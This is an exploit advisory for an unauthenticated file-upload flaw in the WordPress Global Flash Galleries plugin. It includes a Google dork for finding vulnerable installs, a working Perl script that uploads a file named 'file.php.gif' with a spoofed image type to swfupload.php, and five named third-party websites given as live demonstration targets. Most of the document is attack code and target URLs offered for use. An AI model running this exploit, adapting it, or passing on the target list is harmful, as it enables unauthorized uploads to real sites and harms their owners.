WordPress Global Flash Galleries plugin suffers from an arbitrary file upload vulnerability. Note that this finding houses site-specific data.
2dd83399faca3e5d1e36f0966e5019a64279821bcb41fc8ebfee2cd41cd4b56f
###############################################################
# Exploit Title: WordPress global-flash-galleries Plugin Remote File
Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 01/18/2014
# Vendor Homepage: http://wordpress.org
# Software Link :
http://downloads.wordpress.org/plugin/global-flash-galleries.zip
# Google dork: inurl:/wp-content/plugins/global-flash-galleries/
# Tested on: Windows/Linux
###############################################################
# Description :
Global-Flash Galleris allows file upload to unauthenticated users. Filters in
place only permits uploads of image files (extensions .gif, .png and .jpg).
This avoids scripts execution problems but an
attacker could use the affected system to Host files.
Vulnerability occurs due an innapropiate cookie validation in :
/global-flash-galleries/swfupload.php
# Exploit :
= = = = = = = = =
[Perl]
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;
my ($url, $file) = @ARGV;
my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => 'form-data',
Content => [
name => $name,
galleryselect => 1, # Gallery ID (popup.php)
Filedata => [ "$file", "file.php.gif", Content_Type =>
'image/gif' ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}
[Perl]
# Exploit demo :
= = = = = = = = =
http://radiostan.fm/wp-content/plugins/global-flash-galleries/swfupload.php
http://izhairstudio.ca/wp-content/plugins/global-flash-galleries/swfupload.php
http://awb.usahidsolo.ac.id/wp-content/plugins/global-flash-galleries/swfupload.php
http://minigolfcourseulles.fr/wp-content/plugins/global-flash-galleries//swfupload.php
http://madiro-hotel.com/wp-content/plugins/global-flash-galleries/swfupload.php
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# Special Tnx to V1R4N64R ,C4T,HAMIDx9
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #